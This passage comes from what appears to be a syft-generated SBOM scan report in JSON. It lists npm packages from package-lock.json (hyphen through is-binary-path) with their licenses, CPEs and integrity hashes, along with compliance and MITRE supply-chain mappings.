"T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "eedb1c984540056e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: hyphen 1.14.1", "title": "hyphen 1.14.1", "description": "Package discovered: hyphen 1.14.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0cfa30ecdd760351", "name": "hyphen", "version": "1.14.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:hyphen:hyphen:1.14.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/hyphen@1.14.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/hyphen/-/hyphen-1.14.1.tgz", "integrity": "sha512-kvL8xYl5QMTh+LwohVN72ciOxC0OEV79IPdJSTwEXok9y9QHebXGdFgrED4sWfiax/ODx++CAMk3hMy4XPJPOw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "233f854a4d966408", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: iconv-lite 0.4.24", "title": "iconv-lite 0.4.24", "description": "Package discovered: iconv-lite 0.4.24", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3ce09826a837d25b", "name": "iconv-lite", "version": "0.4.24", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:iconv-lite:iconv-lite:0.4.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:iconv-lite:iconv_lite:0.4.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:iconv_lite:iconv-lite:0.4.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:iconv_lite:iconv_lite:0.4.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:iconv:iconv-lite:0.4.24:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:iconv:iconv_lite:0.4.24:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/iconv-lite@0.4.24", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz", "integrity": "sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==", "dependencies": { "safer-buffer": ">= 2.1.2 < 3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a2d6f15d605131f9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: inherits 2.0.4", "title": "inherits 2.0.4", "description": "Package discovered: inherits 2.0.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "911374ff7f37ba7f", "name": "inherits", "version": "2.0.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:inherits:inherits:2.0.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/inherits@2.0.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6970e7e10ca27673", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ini 1.3.8", "title": "ini 1.3.8", "description": "Package discovered: ini 1.3.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "29aeb86d59c0f085", "name": "ini", "version": "1.3.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ini_project:ini:1.3.8:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/ini@1.3.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ini/-/ini-1.3.8.tgz", "integrity": "sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9c64ace1b439e4fe", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: internmap 2.0.3", "title": "internmap 2.0.3", "description": "Package discovered: internmap 2.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "da7b570ddddf2064", "name": "internmap", "version": "2.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:internmap:internmap:2.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/internmap@2.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/internmap/-/internmap-2.0.3.tgz", "integrity": "sha512-5Hh7Y1wQbvY5ooGgPbDaL5iYLAPzMTUrjMulskHLH6wnv/A+1q5rgEaiuqEjB+oxGXIVZs1FF+R/KPN3ZSQYYg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f4c9c2133d427419", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ioredis 5.10.1", "title": "ioredis 5.10.1", "description": "Package discovered: ioredis 5.10.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0c5e141c3ee662a0", "name": "ioredis", "version": "5.10.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ioredis:ioredis:5.10.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/ioredis@5.10.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ioredis/-/ioredis-5.10.1.tgz", "integrity": "sha512-HuEDBTI70aYdx1v6U97SbNx9F1+svQKBDo30o0b9fw055LMepzpOOd0Ccg9Q6tbqmBSJaMuY0fB7yw9/vjBYCA==", "dependencies": { "@ioredis/commands": "1.5.1", "cluster-key-slot": "^1.1.0", "debug": "^4.3.4", "denque": "^2.1.0", "lodash.defaults": "^4.2.0", "lodash.isarguments": "^3.1.0", "redis-errors": "^1.2.0", "redis-parser": "^3.0.0", "standard-as-callback": "^2.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "af1cc3d21ce4d415", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ip-address 10.2.0", "title": "ip-address 10.2.0", "description": "Package discovered: ip-address 10.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "25abf70855373b85", "name": "ip-address", "version": "10.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ip-address:ip-address:10.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ip-address:ip_address:10.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ip_address:ip-address:10.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ip_address:ip_address:10.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ip:ip-address:10.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ip:ip_address:10.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/ip-address@10.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-10.2.0.tgz", "integrity": "sha512-/+S6j4E9AHvW9SWMSEY9Xfy66O5PWvVEJ08O0y5JGyEKQpojb0K0GKpz/v5HJ/G0vi3D2sjGK78119oXZeE0qA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5ea31e6ac67f4d75", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ipaddr.js 1.9.1", "title": "ipaddr.js 1.9.1", "description": "Package discovered: ipaddr.js 1.9.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c7a7f0ed243b0857", "name": "ipaddr.js", "version": "1.9.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ipaddr.js:ipaddr.js:1.9.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/ipaddr.js@1.9.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz", "integrity": "sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fae14e02f5662aa3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: is-arrayish 0.3.4", "title": "is-arrayish 0.3.4", "description": "Package discovered: is-arrayish 0.3.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "88ac3450fc3712b8", "name": "is-arrayish", "version": "0.3.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:is-arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is-arrayish:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is_arrayish:0.3.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/is-arrayish@0.3.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.3.4.tgz", "integrity": "sha512-m6UrgzFVUYawGBh1dUsWR5M2Clqic9RVXC/9f8ceNlv2IcO9j9J/z8UoCLPqtsPBFNzEpfR3xftohbfqDx8EQA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f590fee2d4fea15c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: is-binary-path 2.1.0", "title": "is-binary-path 2.1.0", "description": "Package discovered: is-binary-path 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "12d3bfff6ef69b2c", "name": "is-binary-path", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:is-binary-path:is-binary-path:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-binary-path:is_binary_path:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_binary_path:is-binary-path:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_binary_path:is_binary_path:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-binary:is-binary-path:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-binary:is_binary_path:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_binary:is-binary-path:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_binary:is_binary_path:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is-binary-path:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is_binary_path:2.1.0:*:*:*:*:*:*:*", "source": 